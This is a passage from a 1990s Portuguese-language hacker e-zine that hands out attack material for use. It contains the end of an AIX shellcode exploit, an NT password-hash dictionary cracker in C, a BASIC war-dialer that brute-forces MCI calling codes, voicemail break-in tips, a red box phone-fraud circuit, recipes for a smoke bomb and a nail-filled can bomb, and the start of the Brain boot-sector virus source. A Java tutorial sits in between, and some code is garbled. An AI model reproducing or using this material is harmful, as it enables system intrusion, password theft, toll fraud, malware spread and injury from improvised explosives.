"/bin/sh" /* 0xffffffe7(%ebp): */ "\x01" /* execve: */ "\x8d\x05\x3b\x01\x01\x01" /* leal 0x3b,%eax */ "\x9a\xff\xff\xff\xff\x07\x01" /* lcall 0x7,0x0 */ /* cont: */ "\xc7\xc4XXXX" /* movl $0xXXXXXXXX,%esp */ "\xe8\xcb\xff\xff\xff" /* call geteip */ "\x81\xc5\xef\xff\xff\xff" /* addl $0xffffffef,%ebp */ "\x55" /* pushl %ebp */ "\x55" /* pushl %ebp */ "\x81\xc5\xf1\xff\xff\xff" /* addl $0xfffffff1,%ebp */ "\x55" /* pushl %ebp */ "\xe8\xd4\xff\xff\xff" /* call execve */ }; for(i=0;i #include #include #include main(c,v) int c; char **v; { if(c!=3) { printf("Usage: %s \n", v[0]); exit(1); } copy(v[1], v[2]); } copy(from, to) char *from, *to; { struct stat sa, sb; int max, fd; caddr_t addr; /* Make sure 'from' and 'to' actually exist */ if(stat(from, &sa)) { perror(from); exit(1); } if(stat(to, &sb)) { perror(to); exit(1); } max=sa.st_size; if(sb.st_size>sa.st_size) max=sb.st_size; printf("from: %i to: %i max: %i\n", sa.st_size,sb.st_size,max); fd = open(to, O_RDONLY); addr = mmap(0, max, PROT_READ|PROT_EXEC, MAP_FILE|MAP_SHARED, fd, 0); if(mprotect(addr, max, PROT_READ|PROT_WRITE|PROT_EXEC)) perror("mprotect"); close(fd); fd = open(from, O_RDONLY); if (fd < 0) { perror(from); munmap(addr, max); exit(1); } printf("%i bytes read.\n", read(fd, addr, max)); close(fd); /* munmap(addr, max); /* Unmap again (why doesn't it work ?) */ } -------------------------------------------------------------------------Corta ------------------------------------------------------------------------------ Estes foram os xploits e pelo amor de DEUS este George Guninski entende mesmo de AIX caramba!!!!! Na proxima ediçao vao ter mais xploits (eu espero) eu tenho aqui muitos mais so que ta tudo em sueco para traduzir estes ai já foi maior trampo sem bricar o que eu escrevi ate agora demorou 3 dias! Massss fica por aqui!!!!!!!!!!!! <><><><><><><><><><><><><> 2*//PraTiCas inIcIaIS\\*2 Este é um passo sobre como hackear um (VMB) logo na primeira ligaçao. Uma vez ligado vc se pergunta "e agora?" Aqui nos usamos o sistema Shenendehowa. 1> Certifiquesse que o password tem que conter 4 digitos. 2> É provavel uma palavra com letra. 3> There is no "Z" on the keypad, that invreases the odd (by a little) Depois você entra e vai para Shenendehowa, pressione "*". De um hangup 7 vezes vai em post file. De um reupload e ele vai falar "THIS FILE HAS THE PW IN IT". Ate agora deu certo os possiveis passwords serao. SHEN BAND KODA HIGH CLAS HALL MATH MIKE MATT I00O NICK KIDS THEM THEN CALL ONLY HERE COME THEY HARP INFO DUMB Isto um amigo meu me mandou mas nao quis se identificar ele falou que funciona neste raio deste sistema nele eu confio entao eu coloquei esta merda aqui mas qualquer erro eo qualquer bosta eu nao me responsabilizo. Onde encontrar um VMB? 371-6000 - VmB - Este tel é dos states entao liga o codigo internacional antes. <>< ><><><><><><><><><><><> 3>#@@#<3 Crackeando Passwords de NT by Nihil Eu vi uma porrada de gente pedindo "O moço da FW coloca uma coisa de NT pu favo" ta ai. Este pequeno programinha ferra senhas ou melhor crackeia senhas de NT este programa esta em C++ -------------------------Corta <++> NTPWC/ntpwc.c /* * (C) Nihil 1997. All rights reserved. A Guild Production. #include #include #include #include #include "byteorder.h" #include "md4.h" #define TRUE 1 #define FALSE 0 #define HASHSIZE 16 #define MAX_PASSWORD_LENGTH 14 #define uchar unsigned char #define int16 unsigned short #define uint16 unsigned short #define uint32 unsigned int typedef struct _USER_INFO { char* username; unsigned long ntpassword[4]; }USER_INFO, *PUSER_INFO; typedef struct _UNICODE_STRING { int16* buffer; unsigned long length; }UNICODE_STRING, *PUNICODE_STRING; static int _my_mbstowcs(int16*, uchar*, int); static int _my_wcslen(int16*); void Cleanup(void); int ParsePWEntry(char*, PUSER_INFO); char pPWEntry[258]; char pDictEntry[129]; MDstruct MDContext; int main(int argc,char *argv[]) { FILE *hToCrack, *hDictionary; PUSER_INFO pUserInfo; PUNICODE_STRING pUnicodeDictEntry; int i; unsigned int uiLength; atexit(Cleanup); if (argc != 3) { printf("\nUsage: %s \n", argv[0]); exit(0); } /* open password file */ hToCrack = fopen(argv[1], "r"); if (hToCrack == NULL) { fprintf(stderr,"Unable to open password file\n"); exit(-1); } hDictionary = fopen(argv[2], "r"); if (hDictionary == NULL) { fprintf(stderr,"Unable to open dictionary file\n"); exit(-1); } pUserInfo = (PUSER_INFO)malloc(sizeof (USER_INFO)); if (pUserInfo == NULL) { fprintf(stderr,"Unable to allocate memory for user info structure\n"); exit(-1); } pUnicodeDictEntry = (PUNICODE_STRING)malloc(sizeof (UNICODE_STRING)); if (pUnicodeDictEntry == NULL) { fprintf(stderr,"Unable to allocate memory for unicode conversion\n"); free(pUserInfo); exit(-1); } printf("\nCrack4NT is running...\n"); while (fgets(pPWEntry, sizeof (pPWEntry), hToCrack)) { if (ParsePWEntry(pPWEntry, pUserInfo) == FALSE) { continue; } if (fseek(hDictionary, 0, SEEK_SET)) { fprintf(stderr,"Unable to reset file pointer in dictionary\n"); memset(pUserInfo->ntpassword, 0, HASHSIZE); free(pUserInfo); free(pUnicodeDictEntry); exit(-1); } while (fgets(pDictEntry, sizeof (pDictEntry), hDictionary)) { if (pDictEntry[(strlen(pDictEntry) - 1)] == '\n') { pDictEntry[(strlen(pDictEntry) - 1)] = '\0'; } uiLength = strlen((char *)pDictEntry); if(uiLength > MAX_PASSWORD_LENGTH) uiLength = MAX_PASSWORD_LENGTH; pUnicodeDictEntry->length = (uiLength + 1) * sizeof(int16); pUnicodeDictEntry->buffer = (int16*)malloc(pUnicodeDictEntry->length); if (pUnicodeDictEntry->buffer == NULL) { fprintf(stderr,"Unable to allocate space for unicode string\n"); exit(-1); } _my_mbstowcs( pUnicodeDictEntry->buffer, pDictEntry, uiLength); pUnicodeDictEntry->buffer[uiLength] = 0; uiLength = _my_wcslen(pUnicodeDictEntry->buffer) * sizeof(int16); MDbegin(&MDContext); for(i = 0; i + 64 <= (signed)uiLength; i += 64) MDupdate(&MDContext,pUnicodeDictEntry->buffer + (i/2), 512); MDupdate(&MDContext,pUnicodeDictEntry->buffer + (i/2),(uiLength-i)*8); if (memcmp(MDContext.buffer, pUserInfo->ntpassword, HASHSIZE) == 0) { printf("Password for user %s is %s\n", pUserInfo->username, \ pDictEntry); /* we are done with the password entry so free it */ free(pUnicodeDictEntry->buffer); break; } free(pUnicodeDictEntry->buffer); } } /* cleanup a bunch */ free(pUserInfo->username); memset(pUserInfo->ntpassword, 0, HASHSIZE); free(pUserInfo); free(pUnicodeDictEntry); /* everything is great */ printf("Crack4NT is finished\n"); return 0; } void Cleanup() { memset(pPWEntry, 0, 258); memset(pDictEntry, 0, 129); memset(&MDContext.buffer, 0, HASHSIZE); } int ParsePWEntry(char* pPWEntry, PUSER_INFO pUserInfo) { int HexToBin(char*, uchar*, int); char pDelimiter[] = ":"; char* pTemp; char pNoPW[] = "NO PASSWORD*********************"; char pDisabled[] = "********************************"; /* check args */ if (pPWEntry == NULL || pUserInfo == NULL) { return FALSE; } pTemp = strtok(pPWEntry, pDelimiter); if (pTemp == NULL) { return FALSE; } pUserInfo->username = (char*)malloc(strlen(pTemp) + 1); if (pUserInfo->username == NULL) { fprintf(stderr,"Unable to allocate memory for user name\n"); return FALSE; } strcpy(pUserInfo->username, pTemp); strtok(NULL, pDelimiter); strtok(NULL, pDelimiter); pTemp = strtok(NULL, pDelimiter); if (pTemp == NULL) { free(pUserInfo->username); return FALSE; } if (strlen(pTemp) != 32) { free(pUserInfo->username); return FALSE; } if (strcmp(pTemp, pNoPW) == 0) { printf("User %s has no password\n", pUserInfo->username); return FALSE; } if (strcmp(pTemp, pDisabled) == 0) { printf("User %s is disabled most likely\n", pUserInfo->username); return FALSE; } if (HexToBin((unsigned char*)pTemp, (uchar*)pUserInfo->ntpassword,16) == FALSE) { free(pUserInfo->username); return FALSE; } memset(pTemp, 0, 32); return TRUE; } int HexToBin(char* pHexString, uchar* pByteString, int count) { int i, j; if (pHexString == NULL || pByteString == NULL) { fprintf(stderr,"A NULL pointer was passed to HexToBin()\n"); return FALSE; } memset(pByteString, 0, count); for (i = 0, j = 0; i < (count * 2); i++) { switch (*(pHexString + i)) { case '0': pByteString[j] ^= 0x00; break; case '1': pByteString[j] ^= 0x01; break; case '2': pByteString[j] ^= 0x02; break; case '3': pByteString[j] ^= 0x03; break; case '4': pByteString[j] ^= 0x04; break; case '5': pByteString[j] ^= 0x05; break; case '6': pByteString[j] ^= 0x06; break; case '7': pByteString[j] ^= 0x07; break; case '8': pByteString[j] ^= 0x08; break; case '9': pByteString[j] ^= 0x09; break; case 'a': case 'A': pByteString[j] ^= 0x0A; break; case 'b': case 'B': pByteString[j] ^= 0x0B; break; case 'c': case 'C': pByteString[j] ^= 0x0C; break; case 'd': case 'D': pByteString[j] ^= 0x0D; break; case 'e': case 'E': pByteString[j] ^= 0x0E; break; case 'f': case 'F': pByteString[j] ^= 0x0F; break; default: fprintf(stderr,"invalid character in NT MD4 string\n"); return FALSE; } if (i%2) { j ++; } if ((i%2) == 0) { pByteString[j] <<= 4; } } return TRUE; } static int _my_wcslen(int16 *str) { int len = 0; while(*str++ != 0) len++; return len; } static int _my_mbstowcs(int16 *dst, uchar *src, int len) { int i; int16 val; for(i = 0; i < len; i++) { val = *src; SSVAL(dst,0,val); dst++; src++; if(val == 0) break; } return i; } <--> NTPWC/ntpwc.c EOF ------------------------------------Corta <><><><><><><><><><><><><> 4^:|__ TeCnIcaS de PrOgrAmaçAo__|:^4 Como o prometido na última ediçao vamos falar de ARRAYS, OPERADORES e CONTROLES DE FLUXO. ARRAYS ARRAY ou (vetor ou matriz) é um grupo de váriaveis de mesmo tipo que sao referidas por um nome comum. Array é um tipo especial que um grupo de varáveis do mesmo tipo. Um array pode ser declarado para conter qualquer tipo tipo: Se vc quer um array de 12 inteiros é necessario declarar um array de int. Os colchetes [] sao usados para declarar o array. EXEMPLO: -----------------------------Corta class Array{ int dias_mes []; dias_mes=new int []12; dias_mes[0]=31; dias_mes[1]=28; dias_mes[2]=31; dias_mes[3]=30; dias_mes[4]=31; dias_mes[5]=30; dias_mes[6]=31; dias_mes[7]=30; dias_mes[8]=31; dias_mes[9]=30; dias_mes[10]=31; dias_mes[11]=30; System.out.println ("Abril tem" + dias_mes[]3 + "dias.");}} -----------------------------------------------------------------------Corta ARRAYS MULTIDIMENSIONAIS Em java nao existem arrays multidimensionais e sim arrays de arrays estes se parecem com arrays multidimensionais. Tipo um array tridimensional normal será armazenado. x vezes y vezes z vezes Em java vc pode declarar um variavel para cada um. exemplo: -----------------------Corta double matrix [] [] = new double [4] []; matrix [0] = new double [4]; matrix [1] = new double [4]; matrix [2] = new double [4]; matrix [3] = { 0,1,2,3 }; ----------------------------------------------Corta Operadores Sao pequenas declaraçoes que vc dá parao compilador para fazer algumas operaçoes em operandos. Dividem-se em: Operador unário que opera somente um operando. Operador-prefixo que vem antes do operando. Operador-sufixo que vem depois do operando. Java tem 44 operadores que da uma instruçao so compilador de modo que ele execute uma operaçao mátematica ou lógica. Podem ser: Aritméticos: Sao eles: + adiçao - subtraçao * multiplicaçao / divisao % resto de divisao + incremento += atribuiçao aditiva -= atribuiçao subtrativa /= atribuiçao de divisao %= atribuiçao de modulo -- decremento Básicos Podem ser as quatro operaçoes básicas onde se comporta todos os tipos númericos. Módulo O operador de modulo retorna o resto de uma divisao Aritméticos Cada um dos operadores aritméticos da uma forma de atribuiçao associada a operaçao. Incremento & decremento É a notaçao abreviada para adiçao ou subtraçao de 1 de um operando. Operadores BIT-BIT Inteiros Os tipos long, int, short, char, e byte tem um conjunto adicional de operadores que podem mudar seu valor de bits sao estes: ~ NOT bit-a-bit unário & AND bit-a-bit | OR bit-a-bit ^ OR exclusivo bit-a-bit >> deslocamento à direita >>> com zeros << deslocamento à esquerda &= atribuiçao AND bit-abit |= atribuicao OR bit-a-bit ^= atribuiçao OR exclusivo bit-a-bit >>= aribuiçao de deslocamento à direita >>>= atribuiçao de delocamento à esquerda com preenchimento <<= atribuicao de deslocamento à esquerda Ao contrario dos outros operadores estes trabalham com bit a bit. NOT Operador unário inverte todos os bits de seu operando. AND Combina bits produzindo um bit 1 se ambos os operandos tb forem zero. OR Combina os bits de forma que se os dois forem 1 o resultante é 1. XOR Combina caso um operando for um e o outro nao o resultado é 1 ou 0. Deslocamento a esaquerda Move todos os bits a esquerda de modo que os espaços sao preenchidos por zeros. Deslocamento a direita Idem a esquerda mas no caso passa a direita. Deslocamento a direita sem sinal Idem a esquerda mas nao trabalha com números no caso. Util para se criar máscaras. OPERADORES RELACIONAIS Utilizado para comparar dois valores sao: == igual a != diferente > maior que >= maior ou igual a <= menor ou igual a Qualquer tipo em JAVA pode ser comparado. OPERADORES LOGICOS BOOLEANOS Os operadore lógicos booleanos operam apenas operandos booleanos. sao: & AND lógico | lógico OR ^ lógico XOR (OR exclusivo) || OR dinamico && AND dinamico ! NOT unitario lógico &= Atribuiçao de AND |= Atribuiçao de OR ^= Atribuiçao de XOR == Igual a != diferente de ?: if-then-else ternário Os operadores booleanos AND, OR e XOR operam nos booleanos igual bits em um inteiro. Not inverte o estado booleano tipo de true para false e vice-e-versa. Proxima FW CONTRLOLE DE FLUXO. <><><><><><><><><><><><><> 5*%%PrOgRamAs%%*5 Poxa vida tem gente que nao sabe o que é um programa descriptado e linhas de comando. Gente assim nao pode nem ligar o pc mas como sempre tem um vou clocar um pequena descriçao e se depois vc nao entender deleta todas FW do seu pc. Linhas de comando - Sao as linhas originais do programa tipo aquelas linhas esquisitas como vc's a chamavam aquelas do GUESS do Gravaserv o FWB ou PMC eram linhas de comando é tipo de uma receita que eu dou para um prgrama (linguagem de programaçao) e ele monta o programa para mim ou seja ele compila (passa para o codigo binario). Programa compilado - Por exemplo quando vc edita um arquivo qualquer e aparece um monte de coisas estranhas tipos de umas carinhas simboloas escrotos aquele é o programa compilado. Um monte de gente me perguntou o que era aquelas coisas estranhas eram as linhas originais do programa. Vc precisa compilalo usando o JAVA e em outros o C. Nesta ediçao: MCi Code Hacker by Substance MyURL by Draco MCi Code Hacker by Substance escrito em "nao conheço a linguagem". OCliente by Draco ------------------------------------------------------------------------------ ----------------------Corta ON ERROR GOTO ED BEGIN: RANDOMIZE TIMER CLOSE HACK$(3) = "14" ' CODE LENGTH SCAN$(8) = "40" ' SECONDS TO WAiT FOR CoNNECT OPEN "COM2:2400,N,8,1" FOR RANDOM AS #1: OPEN "CON" FOR OUTPUT AS #2: OPEN "VALIDS.DAT" FOR APPEND AS #3 1 CLS COLOR 11: PRINT " MCi LD K0DE HACKER" COLOR 11: PRINT "■"; : COLOR 9: PRINT " iNiTiALiZiNG MoDeM ": PRINT #1, "ATS11=80": SLEEP 3 COLOR 3: PRINT "■"; : COLOR 9: PRINT " DiALiNG MCi" 4 a$ = INKEY$ TOTAL$ = "": Q$ = "" ' CLEAR MODEM BUFFER NUMS$ = "" ' CLEAR RANDOM #'S LOCATE 4, 1 ' [ ] FOR DL = 1 TO VAL(HACK$(3)) ' [ ] X = INT(RND * 10) ' [ ] IF DL = 1 AND X = 0 THEN X = INT(RND * 9 + 1) ' [ GENERATES ] X$ = STR$(X) ' [ RANDOM ] X$ = RIGHT$(X$, 1) ' [ #'S ] NUMS$ = NUMS$ + X$ ' [ ] NEXT DL ' [ ] PRINT "HACKiNG CODE " + NUMS$ ' [ ] PRINT #1, "ATDT9501022,,,,0-8012501600,,," + NUMS$ Starttime = TIMER IF a$ = CHR$(27) THEN CLOSE : END 2 a$ = INKEY$ Timeleft = INT(TIMER - Starttime) T$ = INPUT$(LOC(1), #1) TOTAL$ = TOTAL$ + T$ IF a$ = CHR$(27) THEN CLOSE : END IF INSTR(1, TOTAL$, "NO CA") > 0 THEN PRINT "NO CARRiER": GOTO BEGIN IF INSTR(1, TOTAL$, "CONN") > 0 THEN PRINT #3, "HACKiNG 95o-1o22 C0DE - " + NUMS$: BEEP: LOCATE 15, 1: PRINT "LAST VALiD CODE " + NUMS$: PRINT #1, "ATZH0": CLOSE #1: OPEN "COM2:19200" FOR RANDOM AS #1: NUMS$ = "": SLEEP 2: TIMEE = 0: GOTO BEGIN IF INSTR(1, TOTAL$, "CARR") > 0 THEN PRINT #3, "HACKiNG 95o-1o22 C0DE - " + NUMS$: BEEP: LOCATE 15, 1: PRINT "LAST VALiD CODE " + NUMS$: PRINT #1, "ATZH0": CLOSE #1: OPEN "COM2:19200" FOR RANDOM AS #1: NUMS$ = "": SLEEP 2: TIMEE = 0: GOTO BEGIN IF INSTR(1, TOTAL$, "BUSY") > 0 THEN PRINT "BUSY": GOTO BEGIN IF a$ = CHR$(27) THEN CLOSE : END TIMEE = VAL(SCAN$(8)) - Timeleft IF TIMEE < 0 THEN PRINT #1, "ATZH0": CLOSE #1: OPEN "COM2:19200" FOR RANDOM AS #1: GOTO 4 LOCATE 5, 1 PRINT TIMEE; " SECONDS LEFT" GOTO 2 END ED: IF ERR = 57 THEN RESUME PRINT ERR PRINT "PLEASE PRESS ENTER ERROR" -------------------------------------Corta ---------------------------------------------------------------------------- MyURL by Draco escrito em JAVA Programa de registro de dominio ------------------------Corta import java.net.*; import java.io.*; class myURL{ public static void main (String args [ ]) throws Exception { int c; URL hp = new URL ("http", "127.0.0.1" , 80, "/"); URLConnection hpCon = hp.openConnection( ); System.out.println("Data: " + hpCon.getDate ()); System.out.println ("Tipo: " + hpCon. getcontentType()); System.out.println("Exp: " + hpCon.getExpirition ( ) ) ; System.out.println("Ult M: " + hpCon. getLastModified ( ) ) ; System.out.println ("Compr: " + hpCon. getContentLength ( ) ) ; if (hpCon.getContentLength ( ) > 0){ System.out.println (" === Conteudo ==="); InputStream entrada = hpCon.getInputStream (); int i=hpCon.getContentLength ( ); while ((( c= entrada.read ()) != -1) && (--i >0)) { System.out.print ((char) c); } entrada.close (); } else { System.out.println ("Nenhum Conteudo Disponivel"); } } } --------------Corta ------------------------------------------------------------------------------ OCliente by Draco escrito em JAVA Programa para cliente na internet ----------------------------------------------------Corta public static void OCliente () throws Exception { while (true) { DatagramPacket p = new Datagrampacket (buffer, buffer.length); ds.receive (p); System.out.println(new String args (p.getData (), 0,0, p.getLength())); } } public static void main (String args []) throws Exception { if (args.length == 1){ ds = new DatagramSocket (portaServ); OServidor (); } else { ds = new DatagramSocket (clientPort); OClient (); } } } --------------------------------------------Corta ------------------------------------------------------------------------------ <><><><><><><><><><><><><> 6=#@!PhReAk!@#=6 Admito que nossa seçao de phreak esta cada vez mais xoxa mas espero que ela melhore cada vez mais. Tomando refrigerante FREE. Vc coloca uma nota de um real na maquina de refrigerantes e aperta dois botoes juntos tipo o da coca e o da fanta juntos e cai duas latas. Comigo deu certo. Ligando FREE. Vc pega um cartao de telefone com 20 unidades e passa grafite nele inteiro mas enfia grafite e hehehehe um cartao com infinitas unidades. Fazendo sua RED BOX Para que usar uma red box no Brasil? Para efetuar ligaçoes internacionais de graça em paises que se utilizam deste sistema com a Albania e USA. Se bem que é mais fácil usar um redbox pelo PC usando o seu dialup mas fica valendo este redbox mais como conhecimento e se no caso de vc usar um orelhao. Essencialmente a red box e um treco onde a companhia telefonica processa que vc depositou as moedinhas no tel. Toda vez vc coloca uma moeda para pagar pela ligaçao, o sinal emitido quando se insere a moeda varia em 1700hz e 220hz. O tom é: Nickel: UM 60 milisegundos de pulso Dime : Dois 60 milisegundos de pulso separando conforme 60 milisegundos Quarter: Cinco 35 milisegundos de pulso separados conforme 35 milisegundos Como usar isto A operaçao é simples. Ligue de uma longa distancia o numero (apenas areas que requerem um nickel genuino), espere pelo ACTS, pressione "deposit" button da red box para vc simular. O sinal da moeda e e enviado da redbox para o telefone por um pequeno auto falante. Construçao Siga passo a passo o esquema abaixo e coloque toda a parafenalha em uma caixa que nao seja de ferro. Lista de materiais NOTA: Deixei os nomes dos principais materiais em inglês pelo fato de que no Brasil em cada canto nego chama de um jeito entao coloco o nome inglês que fica MAIS fácil. Semicondutores (2)556 dual timer (1)741 Op Amp (1)1N914 Switching Diode Resistores (6)10k (1)4.7k (2)100k (4)50k PC Mount Potentiometer (2)20k Multi-Turn Potentiometer Capacitadores (10)0.01uF (1)1.0uF (2)10.0uF Electrolytic Demais coisas (2)14 Pin Dip Socket (1)8 Pin Dip Socket (1)3-position Rotary Switch (1)Momentary Push-Button Switch(normally open) (1)SPST Toggle Switch (1)auto falante (1) caixa (1) 9v bateria Colocando em ordem o Hardware / ┌──S1┘ ──┬─────────┬────────┬────────┬────────────────┬─────────────┐ +9v R1 R2 │ │ │ │ ├───C1────┤ │ R3 │ │ │ │ ┌───┤ ├────┬─C2─@q S3 @n │ o ┌───┴────┴───┴───┐ │ R5 │ @d │ │ o─┤ │ 6 4 14 │ R4 │ │ │ ├──┐ │ S2 o ┌─┤5 13├────┤ g │ ├───┐ │ │ │ │ │ │ │ │ │ │ │ R9<─┘ │ g └─┤10 (IC1556) 8├─┐ R6<─┐ │ R8<──┘ │ │ │ │ │ │ │ │ │ │ │ ┌────┤9 12├─┴──┼──┘ ├──┐ │ │ │ │ │ 3 11 7 2 1 │ C3 │ │ │ │ │ │ └─┬──┬───┬──┬──┬─┘ │ R7<─┘ │ │ │ │ │ │ │ └──┤ g │ │ │ │ │ C4 C5 │ ├────────────────┴──────┴───────┘ │ │ │ │ │ C6 │ │ │ │ │ │ │ │ g g g g │ │ │ └──┬─────┬───────┐ │ R11 │ R12 ┌───┐ │ ┌──┐ │ │ │ │ v │ v │ │ ┌──┼──┐ ├────┴──R13──┐ │ ┌───R10─┴──┤ │ │ │ │ │ │ │ ┌─┴──┴──┴──┴────┴────┐ │ │ │ │ 1 4 14 10 13 │ │ │ │ │ 8├──┬────┤ │ ├──────┬─┤6 │ │ C12 │ │ │ │ 12├──┘ │ │ │ └─┤2 IC2 556 │ │ │ C7 │ │ g │ │ ┌──┤3 11├─────┐ │ │ │ │ 7 5 9 │ │ │ g C8 └────┬───┬───┬───────┘ C11 │ │ │ C9 C10 │ │ │ │ │ │ g │ g │ └─┬─┘ │ g │ │ │ ┌─────────────────┬──────────────┘ │ │ │ │ R14 │ │ │ │\ │ │ │ │ \ │ ├────────────┼───────────│3 \│ │ │ │ 7 \ C13 R15 │IC3 \ │ │ │741 6/──────┐ │ │ │ 4 / │ │ │ │ / │ g g ┌──┤2 / │ │ │ │/ │ │ │ g │ └──────────────────┤ C14 │ Speaker │ g Lista sistematica Resistorer ---------- R1 - 10k R2 - 10k R3 -4.7k R4 - 10k R5 - 10k R6 - 50k R7 - 50k R8 - 50k R9 - 50k R10- 20k R11- 10k R12- 10k R13- 20k R14-100k R15-100k Capacitadores ------------- C1 - 0.01uf C2 - 1N914 switching Diode C3 - 1.0uf C4 - 0.01uf C5 - 0.01uf C6 - 10uf C7 - 0.01uf C8 - 0.01uf C9 - 0.01uf C10 - 0.01uf C11 - 0.01uf C12 - 0.01uf C13 - 0.01uf C14 - 10uf Switches -------- S1 - SPST toggle S2 - Momentary push button N.O. labeled "Deposit" S3 - 3-position rotary switch Demais coisas ------------- g - Ground @q - Label "quarter" @d - Label "dime" @n - Label "nickle" Teve muita gente me pedindo para colocar uma lista como os codigos internacionais aqui estao eles: Albania - 355 Algeria - 213 American Samoa - 684 Andorra - 33 Angola - 244 Anguilla - 809 Antiqua - 809 Argentina - 54 Aruba - 297 Ascension Island - 247 Australia - 61 Austria - 43 Bahamas - 809 Bahrain - 973 Bangladesh - 880 Barbados - 809 Belgium - 32 Belize - 501 Benin - 229 Bermuda - 809 Bhutan - 975 Bolivia - 591 Botswana - 267 Brazil - 55 Virgin Islands - 809 Brunei - 673 Bulgaria - 359 Burkina Faso - 226 Burundi - 257 Cameroon - 237 Canada - NPA Cape Verde Islands - 238 Cayman Islands - 809 Central African Republic-236 Chad Republic - 235 Chile - 56 China - 86 Colombia - 57 RUSSiA - 7 Comoros - 269 Congo - 242 Cook Islands - 682 Costa Rica - 506 Cyprus - 357 Czechoslovakia - 42 Denmark - 45 Djibouti - 253 Dominica - 809 Dominican Republic - 809 Ecuador - 593 Egypt - 20 El Salvador - 503 Equatorial Guinea - 240 Ethiopia - 251 Faeroe Islands - 298 Falkand Islands - 500 FiJi Islands - 679 Finland - 358 France - 33 French Antilles - 596 French Guiana - 594 French Polynesia - 689 Gabon Republic - 241 Gambia - 220 Germany - 37 Germany (Western) - 49 Ghana - 233 Gibraltar - 350 Greece - 30 Greenland - 299 Grenada - 809 Guadeloupe - 590 Guam - 671 Guantanamo Bay - 5399 Guatemala - 502 Guinea-Bissau - 245 Guinea - 224 Guyana - 592 Haiti - 509 Honduras - 504 HoNG KoNG - 852 Hungary - 36 Iceland - 354 India - 91 Indonesia - 62 Iran - 98 Iraq - 964 Ireland - 353 Israel - 972 Italy - 39 Ivory Coast - 225 Jamaica - 809 Japan - 81 Jordan - 962 Kenya - 254 Kiribati - 686 Korea - 82 Kuwait - 965 Lesotho - 266 Liberia - 231 Libyan - 218 Liechtenstien - 41 Lumembourg - 352 Macao - 853 Madagascar - 261 Malawi - 265 Malaysia - 60 Maldives - 960 Mali - 223 Malta - 356 Marshall Islands - 692 Mauritania - 222 Mauritius - 230 Mayotte Island - 269 Mexico - 52 Micronesia - 691 Monaco - 33 Montserrat - 809 Morocco - 212 Mozambique - 258 Namibia - 264 Nauru - 674 Nepal - 977 Netherlands - 31 Nevis - 809 New Caledonia - 687 New Zealand - 64 Nicaragua - 505 Niger - 227 Norway - 47 Oman - 968 Pakistan - 92 Palau - 680 Panama - 507 Paupa - 675 Paraguay - 595 Peru - 51 Philippines - 63 Poland - 48 Portugal - 351 Qatar - 974 Reunion Island - 262 Romania - 40 Rwanda - 250 St. Helena - 290 St. Kitts - 809 St. Lucia - 809 St. Pierre - 508 Vincent - 809 Saipan - 670 San Marino - 39 Sao Tome - 239 Saudi Arabia - 966 Senegal Republic - 221 Seychelles Islands - 248 Sierra Leone - 232 Singapore - 65 Solomon Islands - 677 South Africa - 27 Spain - 34 Sri Lanka - 94 Suriname - 597 Swaziland - 268 Sweden - 46 Switzerland - 41 Syrian Arab Republic - 963 Taiwan Rep of China - 886 Tanzania - 255 Thailand - 66 Togo - 228 Togna Islands - 676 Trinadad and Tobago - 809 Tunisia - 216 Turkey - 90 Turks - 809 Uganda - 256 United Arab Emirates - 971 UK - 44 Uruguay - 598 Vatican City - 39 Venezuela - 58 Western Samoa - 685 Yemen Arab Republic - 967 Yugoslavia - 38 Zaire - 243 Zambia - 260 Zimbabwe - 263 Se vc entende de phreack e-mail ne mim e seja um colaborador da FW. <><><><><><><><><><><><><> 7***(()BoMbAS())***7 Aqui estamos eu dei um lida em alguns resultados que algumas bombas deram e fiquei realmente com um pé atrás mas Junglle que é Junglle coloca mais bombas. Bomba de Fumaça Materiais Lata de refrigerante Pavil Farinha Durepox Procedimento No fundo da lata vc coloca farinha de trigo peneirada de modo que ela fique compacta no lugar dela. Coloca o pavil e completa com polvora. Fecha o buraco com durepox. É só acender o pavil e lá vem fumaça. Bomba de lata Materiais Prego enferrujado Cal Pavil Lata Procedimento Enfia tudo na lata doloca o pavil e prego para tudo quanto é lado. Pq ser anarquista? O governo é uma MERDA vc tem uma enorme taxa tributaria e nao tem porra nenhuma em retorno pergunta para o papai de vc's se nao é. O BRASIL está cada dia mais MERDA e alguem vai ter que mudar isto nem que seja preciso as nossas vidas. <><><><><><><><><><><><><> 8^&&*()*--=->ViRus<-=--*()*&&^8 Ae hlera aquele ultimo e-zine sobre criaçao de virus em Pascal estava na minha opiniao legalzinho mas o ruim é que aquele vírus qualquer anti virus que trabalha por formato pega. Vou colocar 2 vírus criados pelo Dark Angel da 40HEX. Consideraçoes: Me desculpa se a seçao de vírus desta ediçao nao agradar a TODOS vc's é que sabe como é eu nao manjo tanto de vírus e numca me preocupei com eles de fato coloquei na verdade esta seçao de vírus pq acho que quanto mais tecnicas que a pessoa obtiver melhor vai ser. ----------------------------------------Corta org 0 cli jmp entervirus idbytes db 34h, 12h firsthead db 0 firstsector dw 2707h curhead db 0 cursector dw 1 db 0, 0, 0, 0 db 'Welcome to the Dungeon ' copyright db '(c) 1986 Brain' db 17h db '& Amjads (pvt) Ltd VIRUS_SHOE ' db ' RECORD v9.0 Dedicated to th' db 'e dynamic memories of millions o' db 'f virus who are no longer with u' db 's today - Thanks GOODNESS!! ' db ' BEWARE OF THE er..VIRUS : \th' db 'is program is catching prog' db 'ram follows after these messeges' db '..... $' db '#@%$' db '@!! ' entervirus: mov ax,cs mov ds,ax ; ds = 0 mov ss,ax ; set stack to after mov sp,0F000h ; virus sti mov al,ds:[7C00h+offset firsthead] mov ds:[7C00h+offset curhead],al mov cx,ds:[7C00h+offset firstsector] mov ds:[7C00h+offset cursector],cx call calcnext mov cx,5 ; read five sectors mov bx,7C00h+200h ; after end of virus loadnext: call readdisk call calcnext add bx,200h loop loadnext mov ax,word ptr ds:[413h] ; Base memory size in Kb sub ax,7 ; - 7 Kb mov word ptr ds:[413h],ax ; Insert as new value mov cl,6 shl ax,cl ; Convert to paragraphs mov es,ax mov si,7C00h ; Copy from virus start mov di,0 ; to start of memory mov cx,1004h ; Copy 1004h bytes cld rep movsb push es mov ax,200h push ax retf ; return to old boot sector readdisk: push cx push bx mov cx,4 ; Try 4 times tryread: push cx mov dh,ds:[7C00h+offset curhead] mov dl,0 ; Read sector from default mov cx,ds:[7C00h+offset cursector] mov ax,201h ; Disk to memory at es:bx int 13h jnc readOK mov ah,0 ; Reset disk int 13h ; (force read track 0) pop cx loop tryread int 18h ; ROM basic on failure readOK: pop cx pop bx pop cx retn calcnext: mov al,byte ptr ds:[7C00h+offset cursector] inc al mov byte ptr ds:[7C00h+offset cursector],al cmp al,0Ah 